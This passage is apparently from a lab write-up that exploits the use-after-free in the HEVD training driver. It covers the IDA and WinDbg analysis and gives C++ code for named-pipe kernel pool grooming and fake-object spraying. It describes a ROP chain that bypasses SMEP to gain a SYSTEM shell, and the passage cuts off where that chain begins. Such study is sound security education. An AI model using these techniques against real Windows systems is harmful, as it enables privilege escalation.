UseUaFObjectNonPagedPool (0x222017) - This function reads the first 8 bytes (a pointer) of the region the global variable points to and calls it.
AllocateFakeObjectNonPagedPool (0x22201F) - This function allocates 0x58 bytes from the NonPagedPool and fills them with the user’s input, which we will use to exploit this vulnerability.

This is just a brief overview of the functions; each one is explained in more detail below.
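As a quick sanity check on the IOCTL codes listed above, here is a minimal sketch that rebuilds them from the function numbers 0x804 to 0x807 used by the CTL_CODE definitions in the final POC. The constants are copied from the Windows SDK so the snippet compiles without Windows headers, and hevd_ioctl is a hypothetical helper name that exists only in this example.

```cpp
#include <cstdint>

// Values mirror the Windows SDK definitions (winioctl.h) so that the sketch
// builds without any Windows headers.
constexpr std::uint32_t kFileDeviceUnknown = 0x22; // FILE_DEVICE_UNKNOWN
constexpr std::uint32_t kMethodNeither     = 3;    // METHOD_NEITHER
constexpr std::uint32_t kFileAnyAccess     = 0;    // FILE_ANY_ACCESS

// Same bit layout as the CTL_CODE macro:
// (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
constexpr std::uint32_t ctl_code(std::uint32_t device, std::uint32_t function,
                                 std::uint32_t method, std::uint32_t access) {
    return (device << 16) | (access << 14) | (function << 2) | method;
}

// hevd_ioctl is a hypothetical helper name used only in this sketch.
constexpr std::uint32_t hevd_ioctl(std::uint32_t function) {
    return ctl_code(kFileDeviceUnknown, function, kMethodNeither, kFileAnyAccess);
}

// Checked at compile time against the codes quoted in the list above.
static_assert(hevd_ioctl(0x804) == 0x222013, "AllocateUaFObjectNonPagedPool");
static_assert(hevd_ioctl(0x806) == 0x22201B, "FreeUaFObjectNonPagedPool");
static_assert(hevd_ioctl(0x805) == 0x222017, "UseUaFObjectNonPagedPool");
static_assert(hevd_ioctl(0x807) == 0x22201F, "AllocateFakeObjectNonPagedPool");
```

Note that the function numbers are not in the same order as the attack steps: Use is 0x805 and Free is 0x806.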

IDA Analysis

AllocateUaFObjectNonPagedPool

Let’s begin with the first function, AllocateUaFObjectNonPagedPoolIoctlHandler, which calls AllocateUaFObjectNonPagedPool. This call does not take any arguments.

Diving into the AllocateUaFObjectNonPagedPool function, it calls the ExAllocatePoolWithTag() API, which takes 3 arguments:

PoolType is the type of pool memory to allocate. xor ecx, ecx (1️⃣) sets ECX to zero, which corresponds to NonPagedPool (memory that cannot be paged out).
NumberOfBytes (2️⃣), as the name suggests, is the number of bytes to allocate.
Tag (3️⃣) is the pool tag for the allocated memory. It is up to 4 ASCII characters, stored in reverse order: here it’s 0x6B636148, which reads “kcaH” as a value and “Hack” in memory. The purpose of the tag is to attribute allocations to their owner, which helps track down memory leaks. When a user-mode application is force-closed or crashes, the kernel cleans up its memory, but that is not the case for kernel allocations: they stay allocated until explicitly freed.

After the call to ExAllocatePoolWithTag(), the return value (RAX), which is the pointer to the allocated region, is copied to the RDI register (4️⃣).
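To make the “reverse order” of the tag concrete, the following sketch decodes a 32-bit tag value into the characters as they sit in memory on a little-endian machine. pool_tag_to_string and demo_pool_tag are hypothetical names for this example only; they are not part of HEVD or the WDK.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Returns the four tag characters in memory order on a little-endian
// machine, that is, lowest byte of the value first.
inline std::string pool_tag_to_string(std::uint32_t tag) {
    std::string out;
    for (int i = 0; i < 4; ++i) {
        out.push_back(static_cast<char>((tag >> (8 * i)) & 0xFF));
    }
    return out;
}

// 0x6B636148 is 'k' 'c' 'a' 'H' when read as a number, "Hack" in memory.
inline void demo_pool_tag() {
    assert(pool_tag_to_string(0x6B636148u) == "Hack");
}
```

This is also why tools such as !poolused display the tag as “Hack” even though the immediate in the disassembly reads “kcaH”.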

PVOID ExAllocatePoolWithTag(
  [in] __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  [in] SIZE_T                                         NumberOfBytes,
  [in] ULONG                                          Tag
);

Following that, it calls memset (1️⃣), which also takes 3 arguments, to fill the allocated region with A’s. Then it stores the pointer to the allocated region from RDI into the global variable g_UseAfterFreeObjectNonPagedPool (2️⃣).

I made a POC that calls the AllocateUaFObjectNonPagedPool function, so let’s do some dynamic analysis:

1️⃣ is the call to the AllocateUaFObjectNonPagedPool function, 2️⃣ is the call to the ExAllocatePoolWithTag() API, and at 3️⃣ we can see all 3 arguments, where RDX, the size of the region to allocate, is 0x60 bytes.
Stepping over the call to ExAllocatePoolWithTag(), the return value RAX (4️⃣) holds the address of the newly allocated non-paged region. For now it contains leftover data.

Moving on to the call to memset() (1️⃣), it also takes 3 arguments. RCX, the destination, points to <Allocated_Region> + 0x8 rather than to the start of the region returned by ExAllocatePoolWithTag() (2️⃣). Stepping over the call, we can see (3️⃣) that the region is filled with A’s, except for the first 0x8 bytes and the last 0x4 bytes: only the 0x54 bytes in between are filled. This suggests a structure where the first 8 bytes are used for something else and the next 0x54 bytes are a char buffer.

From IDA I couldn’t tell whether it’s a structure or not (maybe the symbols are broken), so I checked the source code: the return value of ExAllocatePoolWithTag() is cast to a pointer to the USE_AFTER_FREE_NON_PAGED_POOL structure. This structure contains 2 members, where the first member is a pointer (8 bytes) and the second is a char array of 0x54 bytes, so what we saw above is correct.

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL
{
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;
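The 0x8 + 0x54 + 0x4 layout seen in the debugger can be checked at compile time. This is a sketch for a 64-bit build; UseAfterFreeObject is a local stand-in for the driver’s structure, and the FunctionPointer signature is an assumption because the typedef is not shown above.

```cpp
#include <cstddef>

typedef void (*FunctionPointer)(void); // assumed signature, not shown in the text

// Local stand-in for USE_AFTER_FREE_NON_PAGED_POOL.
struct UseAfterFreeObject {
    FunctionPointer Callback; // the 8 bytes that memset skips
    char Buffer[0x54];        // the bytes filled with A's
};

static_assert(sizeof(void*) == 8, "sketch assumes a 64-bit build");
static_assert(offsetof(UseAfterFreeObject, Callback) == 0x0, "pointer comes first");
static_assert(offsetof(UseAfterFreeObject, Buffer) == 0x8, "memset starts at +0x8");
// 0x8 + 0x54 = 0x5C, which the compiler pads to the pointer alignment: 0x60.
static_assert(sizeof(UseAfterFreeObject) == 0x60, "matches NumberOfBytes");
```

The 4 bytes of trailing padding are the last 0x4 bytes that were left untouched after the memset call.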

WinDBG has an extension, !poolused, that displays pool usage summarized by tag, and you can also pass it a specific tag. !poolfind <TAG> finds the individual allocations for a tag, but it takes a lot of time. We know that the ExAllocatePoolWithTag() call above uses “Hack” as its tag, and I was able to find it as well.

 1: kd> !poolused
unable to get nt!PspSessionIdBitmap
Using a machine size of ffe7f pages to configure the kd cache

*** CacheSize too low - increasing to 64 MB

Max cache size is       : 67108864 bytes (0x10000 KB) 
Total memory in cache   : 10600 bytes (0xb KB) 
Number of regions cached: 23
99 full reads broken into 110 partial reads
    counts: 81 cached/29 uncached, 73.64% cached
    bytes : 41949 cached/9120 uncached, 82.14% cached
** Transition PTEs are implicitly decoded
** Prototype PTEs are implicitly decoded
..
 Sorting by Tag

               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used
 Hack         1           96          0            0	UNKNOWN pooltag 'Hack', please update pooltag.txt

[::]

FreeUaFObjectNonPagedPool

The second function is FreeUaFObjectNonPagedPoolIoctlHandler, which calls FreeUaFObjectNonPagedPool. It also does not take any arguments, so no user input is required for this call.

Inside the FreeUaFObjectNonPagedPool function:

1️⃣ It checks whether the global variable g_UseAfterFreeObjectNonPagedPool is not NULL. Recall that AllocateUaFObjectNonPagedPool stored the pointer returned by ExAllocatePoolWithTag() in this global variable.
Since we already made the call to AllocateUaFObjectNonPagedPool, it won’t take the jump.
At 2️⃣ it calls ExFreePoolWithTag(), which deallocates a block of pool memory allocated with the specified tag. It takes 2 arguments: the pointer to the region (RCX) 3️⃣ and the tag “Hack” (EDX) 4️⃣.

void ExFreePoolWithTag(
  [in] PVOID P,
  [in] ULONG Tag
);

This is where the first issue arises: the call to ExFreePoolWithTag() deallocates the block, but the function never sets the g_UseAfterFreeObjectNonPagedPool global variable to NULL.

I started dynamic analysis on the FreeUaFObjectNonPagedPool function:

1️⃣ HEVD+0x83008 is the global variable, which holds the address of the allocated region.
2️⃣ is the ExFreePoolWithTag() call, which takes 2 arguments (3️⃣): the address of the allocated region and the tag (“Hack”).
4️⃣ We can also confirm that the region holds the A’s written by memset() in AllocateUaFObjectNonPagedPool.
Stepping over the call and checking the region again (5️⃣), we can see it’s freed.
But the issue is that the global variable (g_UseAfterFreeObjectNonPagedPool) is not set to NULL, and we can see (6️⃣) that it still holds the pointer to the region.

UseUaFObjectNonPagedPool

Moving on to the next step, the UseUaFObjectNonPagedPoolIoctlHandler function calls UseUaFObjectNonPagedPool. Like the previous calls, it does not take any arguments.

Inside the UseUaFObjectNonPagedPool function:

(1️⃣) It checks whether the global variable (g_UseAfterFreeObjectNonPagedPool) is not NULL. If it isn’t NULL, it won’t take the jump, and then (2️⃣) it copies the global variable to the RAX register.
(3️⃣) It then dereferences RAX into the RCX register, which means it copies the first 8 bytes of the allocated region to RCX. Finally, it calls RCX (4️⃣).
This means whatever is placed in the first 8 bytes of the region that the global variable points to will be called by the driver. If you recall, we saw it’s a USE_AFTER_FREE_NON_PAGED_POOL structure whose first member is a pointer (8 bytes), so it basically calls that pointer.
This is the UAF vulnerability: the same pointer is reused after the free because it was never set to NULL.

Let’s test this dynamically by calling AllocateUaFObjectNonPagedPool first and then UseUaFObjectNonPagedPool. We don’t want to free the memory yet; we just want to know whether the first 8 bytes get invoked.

I placed a breakpoint on the call to UseUaFObjectNonPagedPool() (1️⃣) and another where it copies the global variable (g_UseAfterFreeObjectNonPagedPool) to the RAX register (2️⃣). Checking the region the global variable points to (3️⃣), we can see that it contains the A’s and that the first 8 bytes contain a pointer (4️⃣). Moving forward, it performs the dereference (5️⃣) and copies the first 8 bytes to the RCX register, which we can confirm by checking RCX (6️⃣), and finally it calls RCX (7️⃣).

Now that we have a basic understanding of how these functions work, the attack goes as follows. We allocate the memory using AllocateUaFObjectNonPagedPool and then free it using FreeUaFObjectNonPagedPool. The memory is now freed, but the global variable (g_UseAfterFreeObjectNonPagedPool) still holds the pointer to that address. We then need to somehow re-claim the freed memory and place our payload in it. Finally, we call UseUaFObjectNonPagedPool, which calls the pointer in the first 8 bytes of the region the global variable points to.
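The allocate, free, re-claim, use sequence can be modelled entirely in user mode. The sketch below is a toy: ToyPool is a hypothetical fixed array of 0x60-byte slots with a last-in-first-out free list, which is an assumption made for illustration and not how the Windows pool allocator actually works. It only shows why a stale pointer ends up reading attacker-controlled bytes once the slot is reused.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr std::size_t kSlotSize  = 0x60;
constexpr std::size_t kSlotCount = 4;

// Toy model only: fixed-size slots with a LIFO free list.
struct ToyPool {
    alignas(8) unsigned char storage[kSlotCount * kSlotSize] = {};
    std::size_t free_stack[kSlotCount] = {3, 2, 1, 0}; // slot 0 is handed out first
    std::size_t free_top = kSlotCount;                 // number of free slots

    void* alloc() {
        if (free_top == 0) return nullptr;
        return storage + free_stack[--free_top] * kSlotSize;
    }
    void release(void* p) {
        std::size_t offset =
            static_cast<std::size_t>(static_cast<unsigned char*>(p) - storage);
        free_stack[free_top++] = offset / kSlotSize;
    }
};

// Walks the four driver calls in order and returns the value that the
// "Use" step would treat as a function pointer.
inline std::uint64_t simulate_uaf(std::uint64_t attacker_value) {
    ToyPool pool;

    // 1. AllocateUaFObjectNonPagedPool: allocate and remember the pointer.
    void* g_object = pool.alloc();
    assert(g_object != nullptr);
    std::uint64_t legit = 0x1111111111111111ULL; // stand-in for the real callback
    std::memcpy(g_object, &legit, sizeof(legit));

    // 2. FreeUaFObjectNonPagedPool: the slot is freed, g_object is not cleared.
    pool.release(g_object);

    // 3. AllocateFakeObjectNonPagedPool: the next allocation reuses the slot.
    void* fake = pool.alloc();
    std::memcpy(fake, &attacker_value, sizeof(attacker_value));

    // 4. UseUaFObjectNonPagedPool: read the first 8 bytes via the stale pointer.
    std::uint64_t callback = 0;
    std::memcpy(&callback, g_object, sizeof(callback));
    return callback;
}
```

In the toy the reuse is guaranteed because the free list is LIFO and nothing else allocates in between. On a real system that is not guaranteed, which is why the exploit needs pool grooming.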

AllocateFakeObjectNonPagedPool

To re-claim the freed memory, there is a function called AllocateFakeObjectNonPagedPoolIoctlHandler, which takes a user argument (1️⃣) from the _IO_STACK_LOCATION structure. If you recall, in previous posts I explained that _IO_STACK_LOCATION + 0x20 is DeviceIoControl→Type3InputBuffer, which is the user input. It then calls the AllocateFakeObjectNonPagedPool function.

The pointer to the user input (UserFakeObject) is stored in the RSI register:

Moving on, there is an ExAllocatePoolWithTag() call, and it takes 3 arguments that are very similar to what we saw previously:

PoolType is the type of pool memory to allocate. xor ecx, ecx (1️⃣) sets ECX to zero, which corresponds to NonPagedPool (memory that cannot be paged out).
NumberOfBytes (2️⃣), as the name suggests, is the number of bytes to allocate.
Tag (3️⃣) is the pool tag for the allocated memory, written as ASCII characters in reverse order: here it’s 0x6B636148, which reads “kcaH” as a value and “Hack” in memory.
After the call, the return value RAX (5️⃣) is stored in the RDI register.

Moving forward, it calls (1️⃣) ProbeForRead(), which checks that a user-mode buffer actually resides in user space and is correctly aligned. As we can see, it passes UserFakeObject (the user input, RSI) as the Address to check.

Then comes a whole lot of copying (2️⃣):

It uses XMM registers here, which are 16-byte (0x10) registers.
The MOVUPS instruction is like a normal MOV instruction but works on XMM registers: it moves 16 bytes without requiring the memory operand to be aligned.
Let’s start with the first MOVUPS instruction. We already know RSI holds the user input, so it copies the first 16 bytes of user input to the XMM0 register. Then it copies XMM0 to [RDI], the NonPaged pool region allocated in the previous step by ExAllocatePoolWithTag().
Then it copies the next 16 bytes of user input to the XMM1 register and from XMM1 to RDI+0x10, so it is copying the user input into the newly allocated region.
The rest of the instructions copy the remaining user input in the same way. At the end, it copies the QWORD (8 bytes) at RSI + 0x50 to the XMM1 register and then copies it from XMM1 to RDI + 0x50 using the MOVSD instruction, which moves only the lower 8 bytes: XMM1 is 16 bytes wide, but the previous instruction loaded just 8 bytes (a QWORD).
Finally, it adds a null byte at the end of the buffer (3️⃣). In total, it copies 88 bytes (0x58 bytes) of user input.
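The copy sequence above can be mirrored in plain C++ to confirm the 0x58 total. This is a user-mode sketch, not the driver’s code: copy_fake_object is a hypothetical name, and placing the null byte at the last byte of the buffer (offset 0x57) is my assumption about what “end of the buffer” means here.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>

constexpr std::size_t kFakeObjectSize = 0x58;

// Copies the user buffer the way the disassembly does: five 16-byte moves
// (MOVUPS), then one 8-byte move (MOVSD), then a null terminator.
// Returns the number of bytes copied from the user buffer.
inline std::size_t copy_fake_object(const unsigned char* user, unsigned char* kernel) {
    std::size_t offset = 0;
    for (int i = 0; i < 5; ++i) {                   // offsets 0x00, 0x10, ... 0x40
        std::memcpy(kernel + offset, user + offset, 16);
        offset += 16;
    }
    std::memcpy(kernel + offset, user + offset, 8); // offset 0x50
    offset += 8;
    kernel[kFakeObjectSize - 1] = '\0';             // assumed position: offset 0x57
    assert(offset == kFakeObjectSize);              // 5 * 16 + 8 == 0x58
    return offset;
}
```

One practical consequence is that only the last byte of our input is clobbered, so the first 8 bytes, which are the ones UseUaFObjectNonPagedPool calls, arrive intact.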

Let’s try this out. This time I am calling only the AllocateFakeObjectNonPagedPool function. Since the copy through the XMM registers moves 0x58 bytes of user input, I sent 88 bytes (0x58) of A’s to see how it goes.

 CHAR buffer[88];
 memset(buffer, 'A', 88);

 success = DeviceIoControl(
     hDriver,
     ALLOCATE_FAKE_NON_PAGED,
     buffer,
     sizeof(buffer),
     nullptr,
     0,
     nullptr,
     nullptr);

I placed a breakpoint on ExAllocatePoolWithTag() (1️⃣) and got the hit. Checking the parameters (2️⃣), we can see the second argument (RDX = NumberOfBytes) is 0x58 bytes (88 bytes). So now it makes sense: it allocates 0x58 bytes of NonPagedPool and copies the same amount of user input into this region.

Stepping over the call, RAX holds the address (3️⃣) of the allocated nonpaged region, and checking that region shows it contains leftover data (4️⃣, more about this later).

Moving on to the ProbeForRead() call (1️⃣), the RCX register (2️⃣) holds the user-space address, which contains the A buffer we sent (3️⃣).

Then we enter the copy operation. It copies the first 16 bytes of user input to the XMM0 register (1️⃣); if we check XMM0 (2️⃣), we can see it holds the 16 bytes of A’s, and it copies them to the NonPagedPool region (3️⃣). We can also confirm this by checking the memory RDI points to, where the first 16 bytes are overwritten by our input (4️⃣).

Finally, it writes the null terminator (1️⃣) at the end of the buffer, and we can confirm that too (2️⃣).

So the AllocateFakeObjectNonPagedPool function helps us allocate a NonPagedPool region of 0x58 bytes and copy a user input buffer into that newly allocated region. But how can we use this functionality to re-claim the freed memory?

Before that, we need to know a little bit about memory management.

As I explained earlier, VirtualAlloc() allocates memory in units of pages (4KB), and allocating a whole page for a small chunk of memory (like 50 bytes) would be highly inefficient and wasteful. To address this, a heap manager hands out smaller blocks of the required size instead of whole pages. In user mode this is called the heap, and it is dynamically allocated memory, meaning it can grow (or shrink) when required. malloc is one example of an API that allocates from it.

The kernel-space equivalent of the user-space heap is called the kernel pool. It is also dynamically allocated memory: the pool is the heap reserved for kernel land. There are two distinct types of pool memory, paged and non-paged. As you already know:

Paged Pool: This memory can be swapped to disk when not in use.
Non-Paged Pool: This memory is guaranteed to reside in physical memory at all times.

In the Windows kernel, the main function for allocating memory in the pool is ExAllocatePoolWithTag(), and the one for freeing it is ExFreePoolWithTag().

If you recall, ExAllocatePoolWithTag() has a parameter called PoolType, which is a POOL_TYPE enum. As you can see below, there are multiple pool types, but most of them are just variants of NonPagedPool or PagedPool. For example, NonPagedPoolNx is the no-execute (NX) nonpaged pool.

Microsoft recommends not using ExAllocatePoolWithTag() anymore: it has been deprecated in Windows 10, version 2004 and replaced by ExAllocatePool2.

When NonPagedPool memory is allocated, the memory manager decides which pool region the allocation goes into. A pool region is a larger contiguous section of memory that contains small chunks/blocks of allocated memory.

Once we allocate 0x60 bytes using the AllocateUaFObjectNonPagedPool function, we can inspect the address of the allocated region using the !pool command. As you can see, it says the region is Nonpaged pool and lists a whole lot of other blocks in the region, and this pool region contains our allocated block as well.

Also, as you might have noticed, the size of the “Hack” block is 0x70. This is because each pool chunk is prepended with a 0x10-byte _POOL_HEADER, which acts as metadata for the chunk. As you can see, it contains the PoolTag, and ProcessBilled is a pointer to the EPROCESS structure of the process that made the allocation.

//0x10 bytes (sizeof)
struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize:8;                                          //0x0
            USHORT PoolIndex:8;                                             //0x0
            USHORT BlockSize:8;                                             //0x2
            USHORT PoolType:8;                                              //0x2
        };
        ULONG Ulong1;                                                       //0x0
    };
    ULONG PoolTag;                                                          //0x4
    union
    {
        struct _EPROCESS* ProcessBilled;                                    //0x8
        struct
        {
            USHORT AllocatorBackTraceIndex;                                 //0x8
            USHORT PoolTagHash;                                             //0xa
        };
    };
};
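The header overhead explains why a 0x60-byte request shows up as 0x70 in !pool. The sketch below works through that arithmetic and applies it to the 0x58-byte fake object as well. The 0x10-byte rounding granularity is an assumption on my part (it is the usual block alignment on x64), and pool_chunk_size is a hypothetical helper.

```cpp
#include <cstddef>

constexpr std::size_t kPoolHeaderSize = 0x10; // sizeof(_POOL_HEADER), from the dump above
constexpr std::size_t kGranularity    = 0x10; // assumed x64 block granularity

// Requested size plus header, rounded up to the next multiple of kGranularity.
constexpr std::size_t pool_chunk_size(std::size_t requested) {
    return (requested + kPoolHeaderSize + kGranularity - 1) / kGranularity * kGranularity;
}

static_assert(pool_chunk_size(0x60) == 0x70, "UaF object: 0x60 + 0x10");
static_assert(pool_chunk_size(0x58) == 0x70, "fake object: 0x68 rounded up to 0x70");
```

Under that assumption both objects occupy chunks of the same size, which is what makes it possible for the fake object to land in the slot the UaF object used to occupy.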

When a memory region is dynamically allocated and then freed, it goes onto a free list. Freed blocks still hold whatever data they held while they were in use. When the kernel or a kernel driver later asks for NonPagedPool memory, the request is served from the free list where possible, which reduces the overhead of frequent allocation and deallocation.

So if AllocateUaFObjectNonPagedPool allocates 0x60 bytes, we free them using FreeUaFObjectNonPagedPool, and then we allocate 0x58 bytes using AllocateFakeObjectNonPagedPool, there is a chance, but no guarantee, that the free list hands us the same block.

Trying this out, we can see the blocks are close to each other, so they at least come from the same pool region. But this is not enough to exploit the vulnerability.

Exploitation

To exploit this UAF vulnerability and re-claim the freed memory, we will use a technique called Kernel FengShui. I added references below with articles on it. We are going to specifically follow this methodology:

Source: https://elhacker.info/manuales/Análisis de malware/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf

With Kernel Fengshui, also known as kernel pool grooming, we allocate NonPaged blocks/chunks using kernel objects of the same size as the block we are trying to re-claim, which in our case is 0x60 bytes. So we need to find a kernel object of nearly the same size. There is excellent research by Alex Ionescu on Kernel Fengshui: using the CreatePipe() and WriteFile() APIs, it’s possible to create a “File” kernel object whose allocation size we can adjust, and this object is allocated with the tag “NpFr”.

To try this out, I created the following program:

To check how many bytes get allocated, I started with 0x20 bytes of A’s.
I also placed 2 getchar() calls, one before and one after the WriteFile() call. We need to determine the allocation size because the named pipe prefixes our buffer with its own internal header, called DATA_ENTRY. It’s an undocumented structure, so we need to determine its size as well.

#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>

int main() {

    HANDLE rPipe;
    HANDLE wPipe;
    DWORD outLength;

    CHAR buffer[0x20];
    memset(buffer, 'A', 0x20);

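    if (!CreatePipe(&rPipe, &wPipe, NULL, sizeof(buffer))) {
        printf("Error: CreatePipe failed: %lu\n", GetLastError());
        return 1;
    }
    printf("Read pipe handle  : %p\n", rPipe);

    getchar(); // pause: inspect the NpFr pool tag before the write

    printf("Write pipe handle : %p\n", wPipe);

    // The write is what makes npfs.sys allocate the NpFr (DATA_ENTRY) block
    if (!WriteFile(wPipe, buffer, sizeof(buffer), &outLength, NULL)) {
        printf("Error: WriteFile failed: %lu\n", GetLastError());
        return 1;
    }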

    getchar();
}

I ran the program, and after the execution of CreatePipe() I checked the NpFr tag: there are no live allocations (Diff is 0), because we haven’t written anything yet.

0: kd> !poolused 1 NpFr
Using a machine size of ffe7f pages to configure the kd cache
..
 Sorting by Tag

                            NonPaged                                         Paged
 Tag       Allocs       Frees      Diff         Used       Allocs       Frees      Diff         Used

 NpFr        6315        6315         0            0            0           0         0            0	DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL        6315        6315         0            0            0           0         0            0

Stepping forward past the execution of WriteFile(), we can see an allocation of 96 bytes (0x60). We wrote 0x20 bytes of A’s, which means the DATA_ENTRY overhead is 0x40 bytes.

0: kd> !poolused 2 NpFr
Using a machine size of ffe7f pages to configure the kd cache
..
 Sorting by NonPaged Pool Consumed

               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 NpFr         1           96          0            0	DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL         1           96          0            0

Also, it might be confusing that the !poolused command shows sizes in decimal while the !pool command shows them in hexadecimal. To clear this up, I also checked the Hack tag using !poolused, and it clearly uses decimal (112 bytes == 0x70 bytes).

Now that we can control the size of the pool allocation, we increase our buffer to 0x30 bytes so that the Nonpaged pool allocation becomes 0x70 bytes. If you recall, every block is prepended with a _POOL_HEADER structure (0x10 bytes), so we need to account for that too. But why are we doing this? We are trying to create a replica of the “Hack” pool block, which we can then use for the Kernel Fengshui technique.

#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>

int main() {

    HANDLE rPipe;
    HANDLE wPipe;
    DWORD outLength;

    CHAR buffer[0x30];
    memset(buffer, 'A', 0x30);

    if (!CreatePipe(&rPipe, &wPipe, NULL, sizeof(buffer))) {
        printf("Error: CreatePipe failed: %lu\n", GetLastError());
        return 1;
    }
    printf("Read pipe handle  : %p\n", rPipe);
    printf("Write pipe handle : %p\n", wPipe);

    // A 0x30-byte write should produce a 0x70-byte NpFr allocation
    if (!WriteFile(wPipe, buffer, sizeof(buffer), &outLength, NULL)) {
        printf("Error: WriteFile failed: %lu\n", GetLastError());
        return 1;
    }

    getchar();
}
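The buffer size of 0x30 follows directly from the earlier measurement. As a small worked example, the sketch below derives the per-write overhead from the 0x20-byte probe and computes the write size for a target allocation. It assumes the overhead stays constant across write sizes, and pipe_write_size is a hypothetical helper name.

```cpp
#include <cstddef>

// Measured with !poolused in the text: a 0x20-byte write showed up as 0x60 bytes.
constexpr std::size_t kProbeWrite = 0x20;
constexpr std::size_t kProbeUsed  = 0x60;
constexpr std::size_t kOverhead   = kProbeUsed - kProbeWrite; // 0x40

// Write size needed for the NpFr allocation to reach `target` bytes.
// Only meaningful for target >= kOverhead.
constexpr std::size_t pipe_write_size(std::size_t target) {
    return target - kOverhead;
}

static_assert(kOverhead == 0x40, "overhead derived from the probe");
static_assert(pipe_write_size(0x70) == 0x30, "buffer size used for grooming");
```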

Now everything seems good:

This is what we are going to do:

First, we allocate a lot of DATA_ENTRY objects of 0x70 bytes using the CreatePipe() and WriteFile() APIs, by calling them a fixed number of times. This step is called defragmentation: it fills the existing gaps in the pool so that later allocations are placed together in contiguous sections.
After that, we allocate more DATA_ENTRY objects, and we expect these objects to be stored sequentially.

Then we free every second DATA_ENTRY object of the sequential allocations to create holes.

Next, we allocate the 0x60 bytes of Hack using AllocateUaFObjectNonPagedPool and hope it lands in one of the holes we created. The address of this region is stored in the global variable (g_UseAfterFreeObjectNonPagedPool).

We then free that memory using FreeUaFObjectNonPagedPool, but the global variable (g_UseAfterFreeObjectNonPagedPool) is not set to NULL and still holds the pointer to the region (blue).

Then we allocate a lot of malicious objects using AllocateFakeObjectNonPagedPool to fill every hole, one of which is the region g_UseAfterFreeObjectNonPagedPool points to, and finally trigger the call using UseUaFObjectNonPagedPool.
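The plan above can be pictured with a toy model in which the pool is just a row of equally sized slots. Everything in this sketch (Slot, groom, place, demo_grooming) is hypothetical and only illustrates the bookkeeping; the real allocator gives no such ordering guarantees, which is why the exploit sprays many objects.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

enum class Slot { Free, Pipe, Hack, Fake };

inline std::size_t count_slots(const std::vector<Slot>& pool, Slot kind) {
    std::size_t n = 0;
    for (Slot s : pool) {
        if (s == kind) ++n;
    }
    return n;
}

// Sequential DATA_ENTRY allocations, then every second one is freed.
inline std::vector<Slot> groom(std::size_t count) {
    std::vector<Slot> pool(count, Slot::Pipe);
    for (std::size_t i = 0; i < count; i += 2) {
        pool[i] = Slot::Free; // hole surrounded by live pipe objects
    }
    return pool;
}

// Puts one object into the first hole; returns its index, or pool.size() if full.
inline std::size_t place(std::vector<Slot>& pool, Slot kind) {
    for (std::size_t i = 0; i < pool.size(); ++i) {
        if (pool[i] == Slot::Free) {
            pool[i] = kind;
            return i;
        }
    }
    return pool.size();
}

inline void demo_grooming() {
    std::vector<Slot> pool = groom(8);
    assert(count_slots(pool, Slot::Free) == 4);   // half of the objects became holes

    std::size_t stale = place(pool, Slot::Hack);  // AllocateUaFObjectNonPagedPool
    pool[stale] = Slot::Free;                     // FreeUaFObjectNonPagedPool, pointer kept

    while (place(pool, Slot::Fake) != pool.size()) {
        // AllocateFakeObjectNonPagedPool: keep spraying until every hole is filled
    }
    assert(pool[stale] == Slot::Fake);            // the stale slot now holds a fake object
    assert(count_slots(pool, Slot::Free) == 0);
}
```

Freeing every second object of N allocations leaves N / 2 holes, so that is the number of fake objects needed to fill them all in this model.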

To begin with, we need to call the CreatePipe() and WriteFile() APIs a fixed number of times. This for loop calls these APIs for HANDLE_COUNT iterations.

    for (int i = 0; i < HANDLE_COUNT; i++) {
        if (!CreatePipe(&rPipes[i], &wPipes[i], NULL, sizeof(buffer))) {
            printf("Error: CreatePipe failed at iteration %d\n", i);
            break;
        }

        if (!WriteFile(wPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
            printf("Error: WriteFile failed at iteration %d\n", i);
            break;
        }
    }

We can create the hole by closing every second handle:

    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        if (i % 2 == 0) {
            CloseHandle(srPipes[i]);
            CloseHandle(swPipes[i]);
        }
    }

We know that UseUaFObjectNonPagedPool calls a pointer read through g_UseAfterFreeObjectNonPagedPool. So, when creating a fake object using AllocateFakeObjectNonPagedPool, I filled it with B’s to see whether I could make the driver call that. This also needs to be done a fixed number of times (ALLOC_HANDLE_COUNT) to fill every hole, one of the holes being the region g_UseAfterFreeObjectNonPagedPool points to.

    printf("[+] Calling AllocateFakeObjectNonPagedPool....\n");
    printf("[+] Filling the holes with fake objects..\n");

    CHAR buffer[0x58];
    memset(buffer, 'B', 0x58);

    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        success = DeviceIoControl(
            hDriver,
            ALLOCATE_FAKE_NON_PAGED,
            buffer,
            sizeof(buffer),
            nullptr,
            0,
            nullptr,
            nullptr);
    }

I placed a breakpoint in the UseUaFObjectNonPagedPool function where it calls the pointer read through g_UseAfterFreeObjectNonPagedPool. On the first run, RCX was not overwritten, but when I re-ran the code it worked and RCX was overwritten.

I used the same fake stack pivot method that I explained for the type confusion vulnerability, so that UseUaFObjectNonPagedPool executes our stack pivot gadget and pivots to user space, and then executes the rest of the ROP gadgets, which bypass SMEP & VBS (HVCI is disabled in this scenario) and spawn a SYSTEM shell.
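To make the ROP chain’s arithmetic easier to follow, here is a sketch of what it computes: the PTE address of the shellcode page (the same shift and mask as the MiGetPte helper in the POC, plus the PTE base that the chain reads from nt!MiGetPteAddress+0x13) and the effect of adding -4 to that PTE. The PTE base and the PTE value used in the checks are hypothetical example numbers, since the real ones are only known at run time.

```cpp
#include <cstdint>

// Same arithmetic as the MiGetPte helper in the POC: (va >> 9) & 0x7FFFFFFFF8.
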